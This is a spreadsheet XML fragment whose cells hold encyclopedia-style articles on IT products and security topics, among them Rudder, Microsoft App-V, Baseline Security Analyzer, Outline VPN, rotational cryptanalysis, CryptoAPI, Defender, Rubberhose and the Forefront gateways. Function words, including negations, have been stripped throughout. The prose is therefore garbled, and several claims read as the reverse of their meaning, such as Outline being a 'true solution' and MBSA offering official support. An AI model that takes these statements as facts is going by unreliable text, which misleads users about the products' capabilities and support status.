    <t>rudder open source audit configuration management utility help automate system configuration across large infrastructures. rudder relies lightweight local agent installed managed machine. rudder produced normation, founded 2010. server-side interface written scala local agent written published free software general public license 3.0. features host inventory feature-complete interface standardized, reusable policies custom policy editor central reporting historic information policy applied hosts grouping based search queries inventory automatic updating groups (dynamic groups) dynamic generation per-host policies (lessens risk data leaks shared policy) change request validation rest backend history rudder created founding team normation first released free software october 2011.rudder released february 2015. platform support following operating systems supported root server: debian linux ubuntu 16.04 lts, 18.04 20.04 enterprise linux (rhel) centos suse linux enterprise server (sles) 15the following operating systems supported rudder nodes packages available platforms: debian linux ubuntu 10.04 20.04 enterprise linux (rhel) centos suse linux enterprise server (sles) slackware microsoft windows server 2008r2 higher also cfengine ansible (software) bcfg2 chef (software) puppet (software) salt (software) comparison open source configuration management software devops otter (software) references external links official website github account rudder documentation</t>
  </si>
  <si>
    <t>Microsoft App-V</t>
  </si>
  <si>
    <t>microsoft application virtualization (also known app-v; formerly softricity softgrid) application virtualization application streaming solution microsoft. originally developed softricity, company based boston, massachusetts, acquired microsoft july 2006. app-v represents microsoft's entry application virtualization market, alongside virtualization technologies hyper-v, microsoft user environment virtualization (ue-v), remote desktop services, system center virtual machine manager. overview app-v allows applications deployed ("streamed") real-time client virtual application server. removes need traditional local installation applications, although standalone deployment method also supported. with streaming-based implementation, app-v client needs installed client machines application data stored virtual application server installed (streamed) client cache demand first used, pre-installed local cache. app-v stack sandboxes execution environment application make changes directly underlying operating system's file system and/or windows registry, rather contained application-specific "bubble". app-v applications also sandboxed other, different versions application app-v concurrently mutually exclusive applications co-exist system. nevertheless separation security boundary.app-v thus allows centralized installation management deployed applications. supports policy based access control; administrators define restrict access applications certain users, certain computers, defining policies governing usage. app-v also features tracking interface track usage virtualized application. servers implemented highly available configurations desired. app-v client presents user neat, locally installed application experience virtualized applications. access start virtualized application appears identical locally install application, extensions application integrated user's desktop shell app-v client. when virtual applications dependency other, individual virtualized applications also configured together single isolated bubble. microsoft app-v additional component requiring licensing use. licensing user-based either acquired licensing microsoft desktop optimization pack (mdop) client operating systems, part microsoft remote desktop server client access license remote desktop servers. mdop suite technologies available subscription software assurance customers. there also exists licensing model exists hosting (cloud services) providers. major versions variants microsoft released version app-v late november 2012, third generation major redesign entire platform. version modernized product, replacing components designed originally windows windows 2000 years earlier. redesign also allowed support newer operating system features improvements virtualization support. version product still widespread currently active support. microsoft extended version based support windows server 2012 client operating systems; however, newer operating system features available virtualized applications using app-v 4.x. microsoft standard support date app-v july 2015.versions known production more; support versions ended acquisition softricity microsoft. versions represent second generation application virtualization product. there version product. prior release softgrid 2.0, softricity known softwarewow!. softwarewow! early cloud based service provider application store streamed applications (primarily games) consumers. service used in-house first generation product provide software service (saas). although little online information exists company today, product provided streaming services limited virtualization support. offshoot app-v released microsoft name microsoft server application virtualization (“app-v servers”). this platform, supports virtualization redirection without isolation, aimed delivering virtualized server loads would intra-application conflicts. product available part system center virtual machine manager, typically used spin instances servers demand-driven basis. architecture microsoft offers three options deployment virtual applications, affects architectural components used: servers dedicated app-v. system center configuration manager integration. "stand-alone" mode wherein application delivered means.the implementation three deployment options different version app-v used. each described separately. architecture versions based architecture three major options used. three options common components: microsoft application virtualization sequencer, used package customized application virtualized delivery. microsoft application virtualization client, used operating system used virtual application. forms client exist, desktop operating systems (such windows service pack windows server operating systems configured remote desktop session host servers. microsoft application virtualization report server, optional component gather usage information (called metering) virtualized applications. microsoft application virtualization client console, optional component delivered client systems virtual application. typically, console required end-users, however deploying console application provides user additional control virtual applications previously authorized delivered.the remainder architecture dependent deployment option used. full app-v server option full app-v server composed following additional components: microsoft application virtualization management server, used define applications connection groups assign active directory security groups containing lists users computers authorized application. this server also distributes summary information multiple publishing servers. management server implemented service stores configuration information back-end database. service accessed using silverlight-enabled browser powershell. microsoft application virtualization publishing server, used authenticate users computers deliver appropriate virtual application metadata publishing client. package store, simple file share used clients stream virtual applications from. cases, package store fronted server. configuration manager integration option configuration manager composed following components: microsoft system center configuration manager site server, used define operating images, traditional application packages installation, virtual applications, deployment tasks. these items also assigned collections users computers, along requirements dependencies. this information stored database delivered, distribution point, client machines. microsoft system center distribution point, used cache content deployment highly scalable solution. microsoft system center client agent, used pull deployment metadata content distribution point, implement variety client component actions. from app-v perspective, component delivers virtual application app-v client.app-v requires system center configuration manager 2012, above, full support app-v features. deployment older versions, electronic delivery systems, also possible using virtual method deployment. standalone mode app-v clients contains powershell ultimately used server modes above. sometimes desirable directly client, either manually using additional tooling developed third parties. architecture versions based architecture three major options used well. three options couple common components: microsoft application virtualization sequencer, used package customized application virtualized delivery. microsoft application virtualization client, used operating system used virtual application. four forms client exist, combined sets support either operating systems. desktop operating systems (such windows above), server operating systems configured remote desktop session host servers. dedicated app-v management server app-v system architecture composed following components: microsoft systems center virtual application management server, used define applications assign active directory users, security groups containing lists users, authorized application. server also performs runtime authentication authorized lists records application usage (metering) information database reporting. microsoft systems center virtual application management service, .net remoting service, manages client requests applications. this server works conjunction management server provide authorized application metadata publishing, verification authorized use, reporting data. server also handles streaming operations virtualized packages using extension rtsp protocol. app-v management console, management tool administer manage app-v servers. used define policies govern usage applications. also used create, manage, update replicate virtualized application packages. shared system center configuration manager 2009 microsoft offered implement app-v enhancements system center configuration manager. system center configuration manager architecture consists following components: system center configuration manager site server, serving primary repository holding system images, application packages created using traditional installers, virtual applications. system center configuration manager distribution server, used cache distribute software local level.app-v direct integrations configuration manager 2007 2012 "stand-alone" mode app-v clients also used "stand-alone mode" without either server infrastructures previously described. case, sequenced packages delivered using external technique, electronic software delivery system manual deployment. operation aside operations associated deployment operations, app-v application virtualization mainly comprises components app-v sequencer app-v client. app-v sequencer component re-packages application virtualization streaming. analyzes application resources requires, supports customization applications, creates package containing executable components, data files, registry settings required application. package format versions quite different: product uses app-v format based standard compression formats additional features. internally, much metadata formatting borrowed appx. app-v versions produce packages using format, along additional files based modified version open software description (osd) specification originally proposed 1997 microsoft marimba.the sequencer monitors application installation, configuration, runtime file registry resources determine package contents configuration. abstracts machine user specific information improve portability application components, allowing applications different users, different hardware, even different operating systems cases. package also configured streaming operations, portions files delivered as-needed basis clients. guidelines sequencing applications different versions. app-v client receives virtual application package definitions several ways. when configured receive full app-v infrastructure server, occurs automatically logon, timer, initiated app-v client. also sent instructions client api, used system center deployments, virtual msi, stand-alone methods. app-v client powershell based, client uses proprietary sftmime interface. upon receiving package, client download appropriate metadata, possibly (dependent package client configurations) package components. client designed utilize streaming file system operates much like local file paging activity. this allows starting application without file(s) present cache locally. when application requires file portion present, operation called stream-fault performed retrieves needed file portion. streamed package contents cached client memory duration application session, retained local disk cache future use. user settings stored local system using redirection ensure cached copy application changed. cases, allows deployment applications multi-user aware used remote desktop shared host systems. capabilities specific version version 5.x, addition redesign, added number capabilities previously available version. service pack added these. they include: support additional integrations. applications many ways provide integration operating system user desktop shell. previously, application shortcuts, file type associations, integrations available providing user native-like experience. version 5.x, especially service pack beyond, significantly expanded types integrations, called application extensions app-v. addition improved shortcut support, protocol handlers, application capabilities, software clients, paths, variety shell extensions, browser helper objects, active-x integrations added. many extensions help overcome objections virtualizing complicated applications microsoft office plug-ins office. application size. package size limitation gone. documented limit exists app-v packages. improved scripting. dependent components cannot virtualized installed locally app-v client needed using scripting interface, even logged user administrative privileges install software. this includes dependent device drivers. connection groups: used multiple packages need work together single virtual application environment, replaces dynamic suite composition added app-v 4.5. primary benefit redesign connection groups managed objects app-v configuration manager level, rather hidden modifications made administrator. runvirtual: sometimes virtual applications started using locally installed components, local browser using virtualized plug-ins. previously, virtualizing applications caused issues users already created shortcuts local component. using runvirtual, administrator ensure launch local component virtualized. limitations version microsoft office plug-ins: although sequence microsoft office plug-ins, advised sequence many technical usage issues. example, situation plug-ins used user, sequenced separately, user control plug-in sequence starts opens document. work around resolve issue creating single suite dynamic suite plug-ins. application size: maximum client cache size least (the gb), maximum size application (sft file) streamed machine applications installed footprint greater equal client size, client, sequenced. maximum application size softgrid handle 4gb, fat32 file-system. device driver: app-v presently support sequencing kernel-mode device drivers; thus application installs device driver cannot sequenced. exception device driver pre-installed locally; case, application sequenced without device driver. shortcuts: applications minimum shortcut. shortcuts present, application sequenced suite along application needs internet explorer plugins require special shortcut start browser process virtualization layer. middleware: middleware applications good candidates sequencing runtime prerequisites multiple applications. with later versions app-v, sequenced separate package virtual applications linked using feature called dynamic suite composition. path hard coding: application folder/file path hard coded application itself. some applications hard code path files executables rather parameterizing storing windows registry. configuration files ending extensions ini, conf, dat, good places look application-specific settings path information cause problems. failing that, shim used remediate application source code update available. auto update: applications automatic updates sequenced update mechanism cannot disabled. sequenced applications sometimes fail update. addition, allowing auto-update leads compliance application version. services: virtualization services must start boot-time supported. types services generally virtualized; started virtual application starts shuts application main executable terminates. licensing policies: applications licensing enforcement tied machine, e.g. license tied system's address harddisk serial number. this type application sequenced activation done user first launch sequenced application, manually script. internet explorer service packs: microsoft support sequencing version internet explorer. similar technologies liquidware flexapp cameyo citrix xenapp (formerly included "application streaming"/"project tarpon". discontinued windows server 2012. uses app-v well.) installfree bridge novell zenworks application virtualization numecent cloudpaging turbo studio (formerly spoon studio xenocode virtual application) vmware thinapp references further reading external links microsoft application virtualization</t>
  </si>
  <si>
    <t>Microsoft Baseline Security Analyzer</t>
  </si>
  <si>
    <t>microsoft baseline security analyzer (mbsa) discontinued software tool longer available microsoft determines security state assessing missing security updates less-secure security settings within microsoft windows, windows components internet explorer, server, products microsoft server, microsoft office macro settings. security updates determined current version mbsa using windows update agent present windows computers since windows 2000 service pack less-secure settings, often called vulnerability assessment (va) checks, assessed based hard-coded registry file checks. example might permissions directories /www/root folder could level, allowing unwanted modification files outsiders. version history versions 1.2.1 nt4, windows 2000, windows windows server 2003, provide support versions server 2000, internet explorer 5.01 only, microsoft office 2000 2003. security update assessment provided integrated version shavlik's hfnetchk scan tool. mbsa 1.2.1 localized english, german, french japanese versions supported security assessment locale. version retained hard-coded checks, replaced shavlik security assessment engine microsoft update technologies adds dynamic support microsoft products supported microsoft update. mbsa 2.0.1 released support revised windows update (wu) offline scan file (wsusscn2.cab). mbsa added vista windows server 2008 support, vista-styled interface, support latest windows update agent (3.0), remote directory (/rd) feature extended checks platforms. august 2012 security bulletin webcast technet announced "the current version mbsa (2.2) support windows microsoft currently plans release updated version tool."in november 2013 mbsa released. this release adds support windows windows 8.1, windows server 2012, windows server 2012 windows 2000 longer supported release.microsoft support updates mbsa ended. current version offer official support windows windows server 2016. microsoft mbsa webpage removed. mbsa differs microsoft update mbsa scans classes updates, security updates, service packs update rollups. critical optional updates left aside. also belarc advisor references external links official website forum microsoft office visio 2007 connector microsoft baseline security analyzer (mbsa) https://technet.microsoft.com/en-us/security/cc184924.aspx#windows-version</t>
  </si>
  <si>
    <t>Outline VPN</t>
  </si>
  <si>
    <t>outline free open-source tool deploys shadowsocks servers multiple cloud service providers. software suite also includes client software multiple platforms. outline developed jigsaw, technology incubator created google.[3] outline server supports self-hosting, well cloud service providers including digitalocean, rackspace, google cloud platform, amazon ec2. installation involves running command command-line interface, case installing digitalocean google cloud, graphical user interface. components outline three main components: outline server acts proxy relays connections client sites want access. based shadowsocks, offers rest management server outline manager application. outline manager graphical application used deploy manage access outline servers. supports windows, macos linux. outline client connects internet outline server. supports windows, macos, linux, chrome android, ios. security privacy outline uses shadowsocks protocol communication client server. traffic encrypted ietf chacha20 stream cipher (256-bit key) authenticated ietf poly1305 authenticator.outline free open-source, licensed apache license 2.0, audited radically open security claims users’ traffic. outline server supports unattended upgrades. outline true solution rather shadowsocks-based proxy. technologies similar used redirect network traffic make appear originating another device (the server), hide traffic’s final destination observers filters reaches proxy server. however, additional capabilities, encapsulating traffic within virtual tunnel, allowing connected devices “see” connected lan). outline anonymity tool, provide degree anonymity protections tor, routes traffic three hops rather also protects attacks like browser fingerprinting. critical reception march 2018, eddy pcmag stated preview version outline "startlingly easy use" "removes privacy concerns associated companies". however, eddy criticized software encrypting traffic windows, warned users "individual lack anonymity compared [to] large companies".since version 1.2, outline windows client came 'beta', effectively beginning encrypt traffic device, outline clients macos, chrome android, ios. also comparison virtual private network services internet privacy references external links official website</t>
  </si>
  <si>
    <t>Rotational cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, rotational cryptanalysis generic cryptanalytic attack algorithms rely three operations: modular addition, rotation short. algorithms relying operations popular relatively cheap hardware software constant time, making safe timing attacks common implementations. basic idea rotational cryptanalysis rotation operations preserve correlations bit-rotated pairs inputs, addition bit-rotated inputs also partially preserves rotation correlations. rotational pairs inputs thus used "see through" cipher's cascaded operations greater degree might expected. this ability "see" correlations rounds processing exploited break cipher similar differential cryptanalysis. term "rotational cryptanalysis" coined dmitry khovratovich ivica nikolić 2010 paper "rotational cryptanalysis arx", presented best cryptanalytic attacks time reduced-round threefish cipher part skein hash function, sha-3 competition candidate. follow-up attack authors christian rechberger breaks collision resistance rounds skein-256, rounds skein-512. also affects threefish cipher. references</t>
  </si>
  <si>
    <t>Microsoft Cluster Server</t>
  </si>
  <si>
    <t>microsoft cluster server (mscs) computer program allows server computers work together computer cluster, provide failover increased availability applications, parallel calculating power case high-performance computing (hpc) clusters supercomputing). microsoft three technologies clustering: microsoft cluster service (mscs, clustering service), component load balancing (clb) (part application center 2000), network load balancing services (nlb). with release windows server 2008 mscs service renamed windows server failover clustering (wsfc), component load balancing (clb) feature became deprecated. prior windows server 2008, clustering required (per microsoft kbs) nodes clusters identical possible hardware, drivers, firmware, software. after windows server 2008 however, microsoft modified requirements state operating system needs level (such patch level). background cluster server codenamed "wolfpack" development. windows server 4.0, enterprise edition first version windows include mscs software. software since updated server release. cluster software evaluates resources servers cluster chooses used based criteria administration module. june 2006, microsoft released windows compute cluster server 2003, first high-performance computing (hpc) cluster technology offering microsoft. history during microsoft's first attempt development cluster server microsoft originally priced $10,000, problems causing software fail buggy software causing fail-over forcing workload servers single server. this results poor allocation resources, poor performance servers, poor reviews analysts.the announcement update microsoft cluster server software came 1998 promising features 1999 newest addition line windows software form windows enterprise edition. also promising support nodes post release 5.0.microsoft's first attempt pushing cluster server software 2005 super-computing conference seattle software developed, windows compute cluster server 2003 (windows 2003), still beta.on 2006 microsoft reports release full featured windows compute cluster server 2003 (for industrial use) windows compute cluster server 2003 (for small businesses) software public purchase summer 2006. references external links microsoft clustering services</t>
  </si>
  <si>
    <t>Microsoft CryptoAPI</t>
  </si>
  <si>
    <t>microsoft windows platform specific cryptographic application programming interface (also known variously cryptoapi, microsoft cryptography api, ms-capi simply capi) application programming interface included microsoft windows operating systems provides services enable developers secure windows-based applications using cryptography. dynamically linked libraries provides abstraction layer isolates programmers code used encrypt data. crypto first introduced windows enhanced subsequent versions. cryptoapi supports public-key symmetric cryptography, though persistent symmetric keys supported. includes functionality encrypting decrypting data authentication using digital certificates. also includes cryptographically secure pseudorandom number generator function cryptgenrandom. cryptoapi works number csps (cryptographic service providers) installed machine. csps modules actual work encoding decoding data performing cryptographic functions. vendors hsms supply works hardware. cryptography api: next generation windows vista features update crypto known cryptography api: next generation (cng). better factoring allow functions work using wide range cryptographic algorithms, includes number newer algorithms part national security agency (nsa) suite also flexible, featuring support plugging custom cryptographic apis runtime. however, storage providers still support symmetric keys. works user kernel mode, also supports algorithms cryptoapi. microsoft provider implements housed bcrypt.dll. also supports elliptic curve cryptography which, uses shorter keys expected level security, efficient rsa. integrates smart card subsystem including base smart card cryptographic service provider (base csp) module encapsulates smart card api. smart card manufacturers make devices compatible this, rather provide from-scratch solution. also adds support dual_ec_drbg, pseudorandom number generator defined nist 800-90a could expose user eavesdropping national security agency since contains kleptographic backdoor, unless developer remembers generate base points different cryptographically secure pseudorandom number generator true random number generator publish generated seed order remove backdoor. also slow. used called explicitly. also replaces default prng ctr_drbg using block cipher, earlier defined superseded fips 186-2 based either sha-1, broken. ctr_drbg algorithms nist 800-90 endorsed schneier, hash_drbg. also capicom dpapi encrypting file system public-key cryptography cryptographic service provider pkcs#11 crypto (linux) references external links cryptography reference msdn microsoft capi cryptodox</t>
  </si>
  <si>
    <t>Microsoft Defender</t>
  </si>
  <si>
    <t>microsoft defender antivirus (formerly windows defender) anti-malware component microsoft windows. first released downloadable free anti-spyware program windows later shipped windows vista windows evolved full antivirus program, replacing microsoft security essentials, part windows later versions. prior windows defender antivirus graphical desktop app. starting windows windows server 2016, however, users manage defender antivirus indirectly either windows security powershell. defender antivirus part broader microsoft defender endpoint offering. basic features before windows windows defender protected users spyware. includes number real-time security agents monitor several common areas windows changes might caused spyware. also ability remove installed activex software. windows defender featured integrated support microsoft spynet allows users report microsoft consider spyware, applications device drivers allow installed systems. protection viruses subsequently added windows resembles microsoft security essentials (mse). also uses anti-malware engine virus definitions mse. windows windows defender settings controlled windows defender security center. windows anniversary update, logo introduced pop-up notification appear announce results scan, even viruses found. history microsoft antispyware (beta windows defender initially based giant antispyware, formerly developed giant company software, inc. company's acquisition announced microsoft december 2004. while original giant antispyware officially supported older windows versions, support windows line operating systems later dropped microsoft. first beta release microsoft antispyware january 2005, repackaged version giant antispyware. there builds released 2005, last beta refresh released november 2005. 2005 security conference, bill gates, chief software architect co-founder microsoft, announced microsoft antispyware would made available free-of-charge users validly licensed windows 2000, windows windows server 2003 operating systems secure systems increasing malware threat. windows defender (beta november 2005, announced microsoft antispyware renamed windows defender. windows defender (beta released february 2006. featured program's name redesigned user interface. core engine rewritten c++, unlike original giant-developed antispyware, written visual basic. this improved application's performance. also, since beta program works windows service, unlike earlier releases, enables application protect system even user logged beta also requires windows genuine advantage (wga) validation. however, windows defender (beta contain tools found microsoft antispyware (beta microsoft removed system inoculation, secure shredder system explorer tools found msas (beta well tracks eraser tool, allowed users easily delete many different types temporary files related internet explorer including http cookies, cache, windows media player playback history. german japanese versions windows defender (beta later released microsoft. windows defender (final) october 2006, microsoft released final version windows defender. supports windows windows server 2003; however, unlike betas, windows 2000.: some differences beta version improved detection, redesigned user interface delivery definition updates automatic updates. conversion antivirus windows defender released windows vista windows serving built-in anti-spyware component. windows vista windows windows defender superseded microsoft security essentials, antivirus product microsoft provided protection wider range malware. upon installation, microsoft security essentials disabled replaced windows defender. windows microsoft upgraded windows defender antivirus program similar microsoft security essentials windows using virus definition updates. microsoft security essentials windows versions beyond windows windows windows defender default. switches upon installation third-party anti-virus package.: name changes starting windows microsoft began transfer control windows defender original user interface. initially, "settings" dialog replaced dedicated page settings app. then, 1703 update, windows defender renamed windows defender antivirus: became part windows defender security center app,: original user interface could still accessed alternative methods. 1803 update, original user interface ceased available. 1809 update, windows defender security center renamed windows security center.: 2004 update, windows defender antivirus renamed microsoft defender antivirus.: advanced features real-time protection windows defender options, user configure real-time protection options. windows 10's anniversary update introduced limited periodic scanning, optionally allows windows defender scan system periodically another antivirus installed. also introduced block first sight, uses machine learning predict whether file malicious. browser integration integration internet explorer microsoft edge enables files scanned downloaded detect malicious software inadvertently downloaded. april 2018, microsoft defender also available google chrome extension works conjunction google safe browsing. application guard feature released early 2018, windows defender application guard feature exclusive microsoft edge allows users sandbox current browsing session system. this prevents malicious website malware affecting system browser. application guard feature available windows enterprise. 2019, microsoft announced application guard google chrome firefox. extension, installed, open current tabs page microsoft edge application guard enabled. controlled folder access controlled folder access feature introduced windows fall creators update protect user's important files growing threat ransomware. this feature released year later petya family ransomware first appeared. feature notify user every time program tries access folders blocked unless given access user. windows warn user user account control popup final warning "allow" program read controlled folders. windows vista-specific functionality windows defender additional functionality windows vista removed subsequent versions windows: security agents security agents monitor computer malicious activities: auto start monitors lists programs allowed automatically user starts computer system configuration (settings) monitors security-related settings windows internet explorer add-ons monitors programs automatically user starts internet explorer internet explorer configurations (settings) monitors browser security settings internet explorer downloads monitors files programs designed work internet explorer services drivers monitors services drivers interact windows programs application execution monitors programs start operations perform running application registration monitors tools files operating system programs register time windows add-ons monitors add-on programs windows software explorer advanced tools section allows users discover potential vulnerabilities series software explorers. they provide views startup programs, currently running software, network connected applications, winsock providers (winsock lsps). explorer, every element rated either "known", "unknown" "potentially unwanted". first last categories carry link learn particular item, second category invites users submit program microsoft spynet analysis community members. software explorer feature removed windows defender windows notification startup programs administrator windows defender windows vista automatically blocks startup items require administrator privileges (this considered suspicious behavior startup item). this automatic blocking related user account control functionality windows vista, requires users manually startup items time desire item startup. user interface windows vista, possible close window program system tray scan running. however, windows functionality removed window must remain open scan running. windows defender offline windows defender offline (formerly known standalone system sweeper) stand-alone anti-malware program runs bootable removable media (e.g. flash drive) designed scan infected systems windows operating system offline. since windows anniversary update 2016, option boot windows defender offline initiated within windows itself, negating need separate boot disk. mitigated security vulnerability 2017, tavis ormandy, vulnerability researcher google, discovered security vulnerability javascript analysis module (nscript) microsoft antimalware engine (msmpengine) impacted windows defender, microsoft security essentials system center endpoint protection. 2017, microsoft released patch affected systems. technica commended microsoft unprecedented patching speed said disaster averted. reviews during december 2017 test various anti-malware software carried av-test windows windows defender earned points detection rate various malware samples, earning "av-test certified" seal.during february 2018 "real-world protection test" performed av-comparatives, windows defender achieved 100% detection rate malicious samples, along false positive results.an av-test test windows defender october 2019 demonstrated provides excellent protection viruses 0-day malware attacks.on december 2021, av-test gave defender maximum protection score points successfully managing detect ransomware samples test. also microsoft security essentials security safety features windows vista windows security center notes references external links official website</t>
  </si>
  <si>
    <t>Rubberhose (file system)</t>
  </si>
  <si>
    <t>computing, rubberhose (also known development codename marutukku) deniable encryption archive containing multiple file systems whose existence verified using appropriate cryptographic key. name history project originally named rubberhose, designed resistant attacks people willing torture knew encryption keys. this reference rubber-hose cryptanalysis euphemism. written 1997–2000 julian assange, suelette dreyfus, ralf weinmann. technical following paragraphs extracts project's documentation: rubberhose works initially writing random characters entire hard drive dynamic storage device. this random noise indistinguishable encrypted data stored disk. drive want rubberhose encrypted portions assumes aspect encrypted partitions called) fill entire drive. keep drive really filled capacity encrypted material. breaks pieces aspect small pieces scatters across entire drive random manner, aspect looking actually size upon decryption. each aspect passphrase must separately decrypted, hard drive seized neither mathematical analysis physical disk testing reveal many aspects actually exist. internal maps used locate data stored amongst random characters, aspect decrypted specific passphrase. therefore, rubberhose disk safely written passphrases entered. everything works "need know" basis, i.e. aspect knows nothing others avoid writing another. status rubberhose actively maintained, although available linux kernel 2.2, netbsd freebsd. latest version available, still alpha stage, v0.8.3. also rubber-hose cryptanalysis disclosure stegfs references external links "rubberhose mirror". archived original 2011-07-26. retrieved 2010-10-21.{{cite web}}: maint: bot: original status unknown (link) marutukku.org documentation downloads archived 2012-07-16 wayback machine</t>
  </si>
  <si>
    <t>Microsoft Forefront Threat Management Gateway</t>
  </si>
  <si>
    <t>microsoft forefront threat management gateway (forefront tmg), formerly known microsoft internet security acceleration server (isa server), discontinued network router, firewall, antivirus program, server cache microsoft corporation. windows server works inspecting network traffic passes features microsoft forefront offers features include: routing remote access features: microsoft forefront router, internet gateway, virtual private network (vpn) server, network address translation (nat) server proxy server. security features: microsoft forefront firewall inspect network traffic (including content, secure content emails) filter malware, attempts exploit security vulnerabilities content match predefined security policy. technical sense, microsoft forefront offers application layer protection, stateful filtering, content filtering anti-malware protection. network performance features: microsoft forefront also improve network performance: compress traffic improve communication speed. also offers caching: cache frequently-accessed content users access faster local network cache. microsoft forefront 2010 also cache data received background intelligent transfer service, updates software published microsoft update website. history microsoft proxy server microsoft forefront threat management gateway product line originated microsoft proxy server. developed code-name "catapult", microsoft proxy server v1.0 first launched january 1997, designed windows 4.0. microsoft proxy server v1.0 basic product designed provide internet access clients environment tcp/ip. support also provided ipx/spx networks (primarily used legacy novell netware environments), winsock translation/tunnelling client allowed tcp/ip applications, browsers, operate transparently without tcp/ip wire. although well-integrated windows nt4, microsoft proxy server v1.0 basic functionality, came edition. extended support microsoft proxy server v1.0 ended march 2002.microsoft proxy server v2.0 launched december 1997, included better account integration, improved packet filtering support, support wider range network protocols. microsoft proxy server v2.0 exited extended support phase reached life december 2004. server 2000 march 2001, microsoft launched microsoft internet security acceleration server 2000 (isa server 2000). server 2000 introduced standard enterprise editions, enterprise-grade functionality high-availability clustering included standard edition. server 2000 required windows 2000 (any edition), also windows server 2003. accordance microsoft's support lifecycle policy, server 2000 first server product 10-year support lifecycle years mainstream support five years extended support. server 2000 reached life april 2011. server 2004 microsoft internet security acceleration server 2004 (isa server 2004) released september 2004. server 2004 introduced multi-networking support, integrated virtual private networking configuration, extensible user authentication models, application layer firewall support, active directory integration, securenat, improved reporting management features. rules based configuration also considerably simplified server 2000 version. server 2004 enterprise edition included array support, integrated network load balancing (nlb), cache array routing protocol (carp). core capabilities server 2004, dubbed secure server publishing, ability securely expose internal servers internet. example, organizations server 2004 publish microsoft exchange server services outlook access (owa), outlook mobile access (oma) activesync. using forms-based authentication (fba) authentication type, server used pre-authenticate clients traffic unauthenticated clients published servers allowed. server 2004 available editions, standard enterprise. enterprise edition contains features enabling policies configured array level, rather individual servers, load-balancing across multiple servers. each edition server licensed processor. (the version included windows small business server 2000/2003 premium includes licensing processors.) server 2004 runs windows server 2003 standard enterprise edition. appliance hardware containing windows server 2003 appliance edition server standard edition available variety microsoft partners. server 2006 microsoft internet security acceleration server 2006 (isa server 2006) released october 2006. updated version server 2004, retains features server 2004 except message screener. server 2006 introduced features including: support exchange server 2007 (referred "exchange microsoft server 2006 evaluation guide): configuration wizards various tasks setting "site-to-site connection", publishing sharepoint services, publishing websites, creating firewall rules.: introduction single sign-on groups published sites.: improvements user authentication including addition ldap authentication support: resistance flood attacks, protect server "unavailable, compromised, unmanageable flooding attack.": 62–64, performance features bits caching, publishing load balancing http compression.: server appliance edition microsoft also offered server 2006 appliance edition. designed pre-installed onto hardware (server appliances) sold hardware manufacturers stand-alone firewall type device. along appliance edition, server 2006 standard edition enterprise edition available preconfigured hardware.: microsoft forefront microsoft forefront threat management gateway medium business edition (forefront mbe) next version server also included windows essential business server. this version runs 64-bit edition windows server 2008 support enterprise edition features array support enterprise policy. mainstream support forefront ended november 2013. microsoft forefront 2010 microsoft forefront threat management gateway 2010 (forefront 2010) released november 2009. built foundation server 2006 provides enhanced protection, native 64-bit support, support windows server 2008 windows server 2008 malware protection bits caching. service pack product released june 2010. includes several features support windows server 2008 sharepoint 2010 lines products. service pack product released october 2011. september 2012 microsoft announced development take place forefront threat management gateway 2010 product longer available purchase december 2012. mainstream support ceased april 2015 extended support ended april 2020. also microsoft servers microsoft forefront microsoft forefront unified access gateway references external links official website techcenter forefront (isa server) product team blog richard hicks' forefront blog</t>
  </si>
  <si>
    <t>Microsoft Forefront Unified Access Gateway</t>
  </si>
  <si>
    <t>microsoft forefront unified access gateway (uag) discontinued software suite provides secure remote access corporate networks remote employees business partners. services include reverse proxy, virtual private network (vpn), directaccess remote desktop services. released 2010, successor microsoft intelligent application gateway (iag) released 2007. part microsoft forefront offering. microsoft discontinued product 2014, although application proxy feature windows server 2012 later offers functionalities. history unified access gateway originally developed startup company named whale communications rosh haayin, israel. whale's initial product, e-gap, designed create physical separation networks disparate trust levels. consisted appliance housing 512k memory chip toggled connections servers scsi bus. product originally built offer sneaker-net services shortly thereafter features enable http connections added. 90's early 2000's, e-gap enhanced provide comprehensive reverse proxy features included in-depth filtering inbound traffic ensure security servers applications protected. adoption grew, product pivoted focus specifically remote access use-cases additional features licensing options added provide employee contractor remote access across range connectivity options. 2002, market evolved offering comprehensive features. whale's uniqueness ability granularly filter alter flow traffic enable path least access protect known unknown attacks/vulnerabilities using application specific positive logic filtering engine. 2006, microsoft announced would acquiring whale communications. microsoft completed acquisition july 2006. following acquisition, product renamed microsoft intelligent application gateway server 2007. with version, scsi-based (e-gap) dropped, product unified single-server appliance. instead using security barrier, used microsoft's server firewall product. offered public pre-installed appliance celestix networks, networks, portsys nappliance. 2009, release service pack iag, product also offered directly public microsoft form virtual appliance first kind form-factor microsoft) pre-installed could hyper-v vmware workstation. april 2008, microsoft announced next generation named forefront unified access gateway (uag). product released december 2009. uag's core functionality centered directaccess gateway. directaccess, launched windows microsoft's visionary always allowed access continuous endpoint management control. launch, solution publishing directaccess making product integral part windows strategy. ultimately, capabilities (and others) built natively windows server. service pack product released december 2010. update service pack released october 2011 service pack product released august 2011. service pack released february 2013. service pack released november 2013. december microsoft announced microsoft deliver future full version releases forefront product removed price lists july 2014 technical overview microsoft provides secure socket layer (ssl) virtual private network (vpn), application firewall, endpoint security management (for compliance security) enable access control, authorization, content inspection wide variety line-of-business applications. included customized granular access policy security capabilities microsoft exchange server (2003, 2007 2010), microsoft sharepoint portal server (2003, 2007 2010), microsoft terminal services citrix presentation server. product highly customizable, almost application published with uag.out server able work many authentication vendors mi-token, security, onespan, gridsure, swivel, activcard aladdin. also works numerous authentication systems protocols active directory, radius, ldap, ntlm, lotus domino, tacacs+. possible customizations include single-sign-on (sso), well look-and-feel dynamic customization. with current release update product also offers support many third-party systems linux, macintosh iphone. product also supports mozilla firefox. performs particularly well providing portal applications, web-based email intranets, also provides full network access using either activex (when using internet explorer) java components (when using firefox, opera, windows client os). these components also perform end-point compliance checks allowing access, test attributes domain name, antivirus definitions date running processes. inclusion directaccess influence success, directaccess provides seamless vpn-like integration high-demand many organizations. directaccess part windows, provides user-friendly configuration interface making easier configure administrators. also adds additional components dns64 nat64, make deploying directaccess existing network easier, without need deploy ipv6.the product sold appliance form, various vendors. also offered installable dvd. product installed windows server 2008 version history also microsoft forefront references further reading</t>
  </si>
  <si>
    <t>Rsync</t>
  </si>
  <si>
